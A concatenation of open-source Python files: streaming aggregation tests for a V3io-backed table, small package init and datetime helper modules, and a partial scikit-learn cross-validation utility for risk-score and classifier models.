'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5},
{'col1': 4, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
{'col1': 5, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15,
'number_of_stuff_min_1h': 3, 'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5,
'number_of_stuff_max_2h': 5, 'number_of_stuff_max_24h': 5, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0,
'number_of_stuff_avg_24h': 2.5},
{'col1': 6, 'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21,
'number_of_stuff_min_1h': 4, 'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6,
'number_of_stuff_max_2h': 6, 'number_of_stuff_max_24h': 6, 'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0,
'number_of_stuff_avg_24h': 3.0},
{'col1': 7, 'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28,
'number_of_stuff_min_1h': 5, 'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7,
'number_of_stuff_max_2h': 7, 'number_of_stuff_max_24h': 7, 'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0,
'number_of_stuff_avg_24h': 3.5},
{'col1': 8, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36,
'number_of_stuff_min_1h': 6, 'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8,
'number_of_stuff_max_2h': 8, 'number_of_stuff_max_24h': 8, 'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0,
'number_of_stuff_avg_24h': 4.0},
{'col1': 9, 'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45,
'number_of_stuff_min_1h': 7, 'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9,
'number_of_stuff_max_2h': 9, 'number_of_stuff_max_24h': 9, 'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0,
'number_of_stuff_avg_24h': 4.5}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
schema = asyncio.run(load_schema(setup_teardown_test))
expected_schema = {'number_of_stuff': {'period_millis': 600000, 'aggregates': ['max', 'min', 'sum', 'count']}}
_assert_schema_equal(schema, expected_schema)
other_table = Table(setup_teardown_test, V3ioDriver())
try:
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max'],
SlidingWindows(['1h', '24h'], '3m'))],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
controller.await_termination()
# Reaching this point means the incompatible schema change was wrongly accepted.
assert False, 'expected ValueError for incompatible aggregation period'
except ValueError:
pass
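# Query one hour after the last stored event: the 30m sliding window no longer covers
# anything, while the 2h window still covers the last event.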
def test_query_aggregate_by_key_sliding_window_new_time_exceeds_stored_window(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
SlidingWindows(['30m', '2h'], '1m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 3
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(hours=i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 1, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
{'col1': 2, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_count_30m', 'number_of_stuff_count_2h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(hours=items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 3, 'number_of_stuff_count_30m': 0, 'number_of_stuff_count_2h': 1}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
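# Fixed-window variant: the query time falls into fresh 30m and 2h buckets that
# contain no events, so both counts are zero.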
def test_query_aggregate_by_key_fixed_window_new_time_exceeds_stored_window(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
FixedWindows(['30m', '2h']))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 3
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=45 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 1, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 2, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_count_30m', 'number_of_stuff_count_2h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(hours=items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 3, 'number_of_stuff_count_30m': 0, 'number_of_stuff_count_2h': 0}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
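# The next two tests query 10 days after ingestion, far beyond every stored window,
# so all counts drop to zero for both window types.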
def test_sliding_query_time_exceeds_stored_window_by_more_than_window(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
SlidingWindows(['30m', '2h'], '1m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 3
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(hours=i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 1, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
{'col1': 2, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_count_30m', 'number_of_stuff_count_2h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(days=10)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 3, 'number_of_stuff_count_30m': 0, 'number_of_stuff_count_2h': 0}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_fixed_query_time_exceeds_stored_window_by_more_than_window(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
FixedWindows(['30m', '2h']))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 3
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=45 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 1, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 2, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_count_30m', 'number_of_stuff_count_2h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(days=10)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 3, 'number_of_stuff_count_30m': 0, 'number_of_stuff_count_2h': 0}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
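# A flow object may be run more than once against the same table; the second run
# resumes from the aggregations persisted by the first, which is why the expected
# results differ per iteration.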
def test_write_to_table_reuse(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
flow = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'], FixedWindows(['30m', '2h']))], table),
NoSqlTarget(table), Reduce([], lambda acc, x: append_return(acc, x))
])
items_in_ingest_batch = 3
expected_results = [
[{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1, 'col1': 0},
{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1, 'col1': 1},
{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2, 'col1': 2}],
[{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1, 'col1': 0},
{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1, 'col1': 1},
{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2, 'col1': 2},
{'col1': 0},
{'number_of_stuff_count_30m': 2, 'number_of_stuff_count_2h': 2, 'col1': 1},
{'number_of_stuff_count_30m': 2, 'number_of_stuff_count_2h': 3, 'col1': 2}],
]
for iteration in range(2):
controller = flow.run()
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=45 * i))
controller.terminate()
actual = controller.await_termination()
assert actual == expected_results[iteration]
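# Compound string key (first_name, last_name): ingest from a DataFrame keyed on both
# columns, then query back by passing the key as a list.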
def test_aggregate_multiple_keys(setup_teardown_test):
t0 = pd.Timestamp(test_base_time)
data = pd.DataFrame(
{
'first_name': ['moshe', 'yosi', 'yosi'],
'last_name': ['cohen', 'levi', 'levi'],
'some_data': [1, 2, 3],
'time': [t0 - pd.Timedelta(minutes=25), t0 - pd.Timedelta(minutes=30),
t0 - pd.Timedelta(minutes=35)]
}
)
keys = ['first_name', 'last_name']
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
DataframeSource(data, key_field=keys, time_field='time'),
AggregateByKey([FieldAggregator('number_of_stuff', 'some_data', ['sum'],
SlidingWindows(['1h'], '10m'))],
table, emit_policy=EmitAfterMaxEvent(1)),
NoSqlTarget(table),
]).run()
actual = controller.await_termination()
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h'],
other_table, key=['first_name', 'last_name']),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'first_name': 'moshe', 'last_name': 'cohen', 'some_data': 4}, ['moshe', 'cohen'], event_time=test_base_time)
controller.emit({'first_name': 'moshe', 'last_name': 'levi', 'some_data': 5}, ['moshe', 'levi'], event_time=test_base_time)
controller.emit({'first_name': 'yosi', 'last_name': 'levi', 'some_data': 6}, ['yosi', 'levi'], event_time=test_base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 1.0, 'first_name': 'moshe', 'last_name': 'cohen', 'some_data': 4},
{'first_name': 'moshe', 'last_name': 'levi', 'some_data': 5},
{'number_of_stuff_sum_1h': 5.0, 'first_name': 'yosi', 'last_name': 'levi', 'some_data': 6}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
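# Querying a key that was never written should pass the event through without
# attaching any aggregation columns.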
def test_read_non_existing_key(setup_teardown_test):
data = pd.DataFrame(
{
'first_name': ['moshe', 'yosi', 'yosi'],
'last_name': ['cohen', 'levi', 'levi'],
'some_data': [1, 2, 3],
'time': [test_base_time - pd.Timedelta(minutes=25), test_base_time - pd.Timedelta(minutes=30),
test_base_time - pd.Timedelta(minutes=35)]
}
)
keys = 'first_name'
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
DataframeSource(data, key_field=keys),
AggregateByKey([FieldAggregator('number_of_stuff', 'some_data', ['sum'],
SlidingWindows(['1h'], '10m'))],
table),
NoSqlTarget(table),
]).run()
actual = controller.await_termination()
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h'],
other_table, keys='first_name'),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'last_name': 'levi', 'some_data': 5}, 'non_existing_key')
controller.terminate()
actual = controller.await_termination()
print(actual[0])
assert 'number_of_stuff_sum_1h' not in actual[0]
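# Two flows concurrently update different aggregations of the same key through
# separate Table instances; both attributes must survive in the stored row.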
def test_concurrent_updates_to_kv_table(setup_teardown_test):
table1 = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=None)
table2 = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=None)
controller1 = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('attr1', 'attr1', ['sum'], SlidingWindows(['1h'], '10m'))], table1),
NoSqlTarget(table1)
]).run()
controller2 = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('attr2', 'attr2', ['sum'], SlidingWindows(['1h'], '10m'))], table2),
NoSqlTarget(table2)
]).run()
try:
for i in range(10):
controller1.emit({'attr1': i}, key='onekey', event_time=test_base_time)
controller2.emit({'attr2': i}, key='onekey', event_time=test_base_time)
finally:
controller1.terminate()
controller2.terminate()
controller1.await_termination()
controller2.await_termination()
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['attr1', 'attr2'], table, key='mykey'),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'mykey': 'onekey'}, event_time=test_base_time)
controller.terminate()
result = controller.await_termination()
assert result == [{'mykey': 'onekey', 'attr1': 9, 'attr2': 9}]
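# Two AggregateByKey steps can share one table. Since every event updates all
# aggregations registered on the shared table, both aggregators see the value before
# (1) and after (10) the Map step, giving avg (1 + 10) / 2 = 5.5 and sum 1 + 10 = 11.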
def test_separate_aggregate_steps(setup_teardown_test):
def map_multiply(x):
x['some_data'] = x['some_data'] * 10
return x
t0 = pd.Timestamp(test_base_time)
data = pd.DataFrame(
{
'first_name': ['moshe', 'yosi', 'katya'],
'some_data': [1, 2, 3],
'time': [t0 - pd.Timedelta(minutes=25), t0 - pd.Timedelta(minutes=30),
t0 - pd.Timedelta(minutes=35)]
}
)
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
DataframeSource(data, key_field='first_name', time_field='time'),
AggregateByKey([FieldAggregator("number_of_stuff", "some_data", ["avg"],
SlidingWindows(['1h'], '10m'))], table),
Map(map_multiply),
AggregateByKey([FieldAggregator("number_of_stuff2", "some_data", ["sum"],
SlidingWindows(['2h'], '10m'))], table),
NoSqlTarget(table),
]).run()
controller.await_termination()
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_avg_1h', 'number_of_stuff2_sum_2h'],
other_table, key=['first_name']),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'first_name': 'moshe'}, ['moshe'], event_time=test_base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [{'number_of_stuff2_sum_2h': 11.0, 'number_of_stuff_avg_1h': 5.5, 'first_name': 'moshe'}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
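# 'first' and 'last' aggregations over a sliding window: two batches are written an
# hour apart, then read back at a point inside each hour.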
def test_write_read_first_last(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=None)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('attr', 'attr', ['first', 'last'], SlidingWindows(['1h'], '10m'))], table),
NoSqlTarget(table)
]).run()
try:
for i in range(10):
controller.emit({'attr': i}, key='onekey', event_time=test_base_time + timedelta(minutes=i))
controller.emit({'attr': i * 10}, key='onekey', event_time=test_base_time + timedelta(hours=1, minutes=i))
finally:
controller.terminate()
controller.await_termination()
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['attr_first_1h', 'attr_last_1h'], table, key='mykey'),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'mykey': 'onekey'}, event_time=test_base_time + timedelta(minutes=10))
controller.emit({'mykey': 'onekey'}, event_time=test_base_time + timedelta(hours=1, minutes=10))
controller.terminate()
result = controller.await_termination()
assert result == [{'mykey': 'onekey', 'attr_first_1h': 0.0, 'attr_last_1h': 9.0},
{'mykey': 'onekey', 'attr_first_1h': 0.0, 'attr_last_1h': 90.0}]
def test_non_existing_key_query_by_key_from_v3io_key_is_list(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
df = pd.DataFrame([['katya', 'green', 'hod hasharon'], ['dina', 'blue', 'ramat gan']], columns=['name', 'color', 'city'])
controller = build_flow([
DataframeSource(df, key_field='name'),
NoSqlTarget(table),
]).run()
controller.await_termination()
controller = build_flow([
SyncEmitSource(),
QueryByKey(["color"], table, key=["name"]),
QueryByKey(["city"], table, key="name"),
]).run()
controller.emit({'nameeeee': 'katya'}, 'katya')
controller.terminate()
controller.await_termination()
def test_multiple_keys_int(setup_teardown_test):
t0 = pd.Timestamp(test_base_time)
data = pd.DataFrame(
{
'key_column1': [10, 20], 'key_column2': [30, 40], 'key_column3': [5, 6], 'key_column4': [50, 60],
'some_data': [1, 2],
'time': [t0 - pd.Timedelta(minutes=25), t0 - pd.Timedelta(minutes=30)]
}
)
keys = ['key_column1', 'key_column2', 'key_column3', 'key_column4']
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
DataframeSource(data, key_field=keys, time_field='time'),
AggregateByKey([FieldAggregator('number_of_stuff', 'some_data', ['sum'],
SlidingWindows(['1h'], '10m'))],
table, emit_policy=EmitAfterMaxEvent(1)),
NoSqlTarget(table),
]).run()
actual = controller.await_termination()
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h'],
other_table, key=keys),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'key_column1': 10, 'key_column2': 30, 'key_column3': 5, 'key_column4': 50},
key=[10, 30, 5, 50], event_time=test_base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 1.0, 'key_column1': 10, 'key_column2': 30, 'key_column3': 5, 'key_column4': 50}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_aggregate_float_key(setup_teardown_test):
t0 = pd.Timestamp(test_base_time)
data = pd.DataFrame(
{
'key_column2': [5.6, 8.6],
'some_data': [1, 2],
'time': [t0 - pd.Timedelta(minutes=25), t0 - pd.Timedelta(minutes=30)]
}
)
keys = ['key_column2']
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
DataframeSource(data, key_field=keys, time_field='time'),
AggregateByKey([FieldAggregator('number_of_stuff', 'some_data', ['sum'],
SlidingWindows(['1h'], '10m'))],
table, emit_policy=EmitAfterMaxEvent(1)),
NoSqlTarget(table),
]).run()
actual = controller.await_termination()
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h'],
other_table, key=keys),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'key_column2': 8.6},
key=[8.6], event_time=test_base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [{'number_of_stuff_sum_1h': 2.0, 'key_column2': 8.6}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
[per-file quality-signal columns omitted]
--- src/kirby_transform/outputs/__init__.py (SrzStephen/Kirby-Transform, MIT) ---
from kirby_transform.outputs.influx2.process import InfluxAPI
from kirby_transform.outputs.timestream.process import TimestreamPush
[per-file quality-signal columns omitted]
--- wttime/tests/util.py (PJK/wttime, MIT) ---
from datetime import datetime
import dateutil.tz as tz
def utc_midnight(y, m, d):
return datetime(y, m, d, tzinfo=tz.tzutc())
[per-file quality-signal columns omitted]
--- pi/settings/__init__.py (DebasishMaji/PI, Apache-2.0) ---
from .base_config import *
from .kafka_consumer_config import *
from .kafka_producer_config import *
import sys
sys.path.append("..")
[per-file quality-signal columns omitted]
--- utils/crossvalidation.py (IA-Cardiologia-husa/KoopaML, Apache-2.0) ---
import numpy as np
import pandas as pd
import sklearn.model_selection as sk_ms
import sklearn.utils as sk_u
import sklearn.calibration as sk_cal
import sklearn.linear_model as sk_lm
import time
from .stratifiedgroupkfold import StratifiedGroupKFold
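# Validation and cross-validation helpers. The 'RS' variants score with fixed
# per-feature odds ratios (a risk score); the 'ML' variants fit a classifier,
# optionally calibrated with isotonic or sigmoid regression. All return
# {"true_label": ..., "pred_prob": ...} with one entry per fold.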
def external_validation_RS(external_data, label, feature_oddratio):
X = external_data
Y = external_data.loc[:,[label]]
Y_prob = pd.Series(0, index=X.index)
for feat in feature_oddratio.keys():
Y_prob += feature_oddratio[feat]*X.loc[:,feat]
#Saved as a list of lists because of compatibility with predict_kfold
tl_pp_dict={"true_label":[list(Y.values.flat)], "pred_prob":[list(Y_prob.values.flat)]}
return tl_pp_dict
def external_validation(external_data, label, features, clf):
X = external_data.loc[:,features]
Y = external_data.loc[:,[label]]
Y_prob = clf.predict_proba(X)[:,1]
#Saved as a list of lists because of compatibility with predict_kfold
tl_pp_dict={"true_label":[list(Y.values.flat)], "pred_prob":[list(Y_prob)]}
return tl_pp_dict
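# K-fold CV in which each training fold is first passed through filter_function and
# rows with a missing label are dropped; the test fold is used as-is.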
def predict_filter_kfold_ML(data, label, features, filter_function, clf, calibration, seed, cvfolds):
kf = sk_ms.KFold(cvfolds, random_state=seed, shuffle=True)
predicted_probability = []
true_label = []
for train_index, test_index in kf.split(data):
data_train, data_test = data.iloc[train_index], data.iloc[test_index]
X_train = filter_function(data_train).loc[:,features]
Y_train = filter_function(data_train).loc[:,[label]]
X_train = X_train.loc[~Y_train[label].isnull()]
Y_train = Y_train.loc[~Y_train[label].isnull()]
X_test = data_test.loc[:,features]
Y_test = data_test.loc[:,[label]]
if (calibration is None):
clf.fit(X_train, Y_train.values.ravel().astype(int))
calibrated_clf = clf
else:
if hasattr(clf, 'best_estimator_'):
clf.fit(X_train, Y_train.values.ravel().astype(int))
if(calibration == 'isotonic'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='isotonic', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='sigmoid', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
else:
raise ValueError('Unknown Calibration type')
else:
if(calibration == 'isotonic'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='isotonic', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='sigmoid', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
try:
Y_prob = calibrated_clf.predict_proba(X_test)
predicted_probability.append(Y_prob[:,1])
except AttributeError:  # classifier has no predict_proba; fall back to decision_function
Y_prob = calibrated_clf.decision_function(X_test)
predicted_probability.append(Y_prob)
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_filter_kfold_RS(data, label, features, filter_function, feature_oddratio, seed, cvfolds):
kf = sk_ms.KFold(cvfolds, random_state=seed, shuffle=True)
predicted_probability = []
true_label = []
for train_index, test_index in kf.split(data):
data_train, data_test = data.iloc[train_index], data.iloc[test_index]
X_train = filter_function(data_train).loc[:,features]
Y_train = filter_function(data_train).loc[:,[label]]
X_train = X_train.loc[~Y_train[label].isnull()]
Y_train = Y_train.loc[~Y_train[label].isnull()]
X_test = data_test
Y_test = data_test.loc[:,[label]]
Y_prob = pd.Series(0, index=X_test.index)
for feat in feature_oddratio.keys():
Y_prob += feature_oddratio[feat]*X_test.loc[:,feat]
predicted_probability.append(Y_prob)
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
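# Plain k-fold or stratified k-fold CV with the same optional calibration logic as above.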
def predict_kfold_ML(data, label, features, cv_type, clf, calibration, seed, cvfolds):
X = data.loc[:,features]
Y = data.loc[:,[label]].astype(bool)
if(cv_type == 'stratifiedkfold'):
skf = sk_ms.StratifiedKFold(cvfolds, random_state=seed, shuffle=True)
elif(cv_type == 'kfold'):
skf = sk_ms.KFold(cvfolds, random_state=seed, shuffle=True)
else:
raise ValueError('incompatible crossvalidation type')
predicted_probability = []
true_label = []
for train_index, test_index in skf.split(X,Y):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
if (calibration is None):
clf.fit(X_train, Y_train.values.ravel().astype(int))
calibrated_clf = clf
else:
if hasattr(clf, 'best_estimator_'):
clf.fit(X_train, Y_train.values.ravel().astype(int))
if(calibration == 'isotonic'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='isotonic', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='sigmoid', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
else:
raise ValueError('Unknown Calibration type')
else:
if(calibration == 'isotonic'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='isotonic', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='sigmoid', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
try:
Y_prob = calibrated_clf.predict_proba(X_test)
predicted_probability.append(Y_prob[:,1])
except AttributeError:  # classifier has no predict_proba; fall back to decision_function
Y_prob = calibrated_clf.decision_function(X_test)
predicted_probability.append(Y_prob)
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_kfold_RS(data, label, features, cv_type, feature_oddratio, seed, cvfolds):
X = data.loc[:, :]
Y = data.loc[:,[label]].astype(bool)
if(cv_type == 'stratifiedkfold'):
skf = sk_ms.StratifiedKFold(cvfolds, random_state=seed, shuffle=True)
elif(cv_type == 'kfold'):
skf = sk_ms.KFold(cvfolds, random_state=seed, shuffle=True)
else:
raise ValueError('incompatible crossvalidation type')
predicted_probability = []
true_label = []
for train_index, test_index in skf.split(X,Y):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
Y_prob = pd.Series(0, index=X_test.index)
for feat in feature_oddratio.keys():
Y_prob += feature_oddratio[feat]*X_test.loc[:,feat]
predicted_probability.append(list(Y_prob.values.flat))
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
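# Group-aware CV (grouped or stratified-grouped folds). fit() is first tried with a
# groups= argument, for searchers that accept one, and falls back to a plain fit for
# ordinary estimators.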
def predict_groupkfold_ML(data, label, features, group_label, cv_type, clf, calibration, seed, cvfolds):
X = data.loc[:,features]
Y = data.loc[:,[label]].astype(bool)
